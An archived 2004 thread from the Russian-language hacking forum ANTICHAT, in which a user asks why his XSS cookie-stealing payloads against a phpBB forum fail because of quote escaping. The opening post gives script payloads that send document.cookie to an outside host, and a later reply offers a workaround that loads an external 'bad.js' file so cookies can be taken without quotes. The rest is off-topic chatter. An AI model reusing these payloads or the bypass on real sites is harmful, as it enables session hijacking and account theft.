ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

30.10.2004, 00:46
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script>document.location=" http://www.asd.as/as.php?xack="+docu...lt;/script>, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script>document.location&a mp;#61&#34www.asd.as/as.php?xack&#61&#34&#43document.cookie </script>, то строка выполняется только до "<script>document.location=" и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
|
|
|

30.10.2004, 01:14
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?
|
|
|

30.10.2004, 18:07
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
|
|
|

31.10.2004, 00:34
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
Последний раз редактировалось Algol; 30.11.2004 в 13:22..
|
|
|

02.11.2004, 21:13
|
|
Новичок
Регистрация: 16.09.2004
Сообщений: 21
Провел на форуме: 0
Репутация:
0
|
|
|
|
|

07.11.2004, 01:10
|
|
Познающий
Регистрация: 13.09.2004
Сообщений: 46
Провел на форуме: 4001
Репутация:
0
|
|
|
|
|

25.11.2004, 13:57
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме: 5619724
Репутация:
2944
|
|
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
|
|
|

25.11.2004, 20:52
|
|
Новичок
Регистрация: 23.08.2004
Сообщений: 16
Провел на форуме: 2959
Репутация:
4
|
|
Сообщение от PEPSICOLA
Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
А при чём тут он?????? 
|
|
|

26.11.2004, 03:04
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме: 5619724
Репутация:
2944
|
|
Мне его так не хватает...  ... 
|
|
|

24.12.2004, 16:32
|
|
Новичок
Регистрация: 24.12.2004
Сообщений: 2
Провел на форуме: 3851
Репутация:
0
|
|
Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|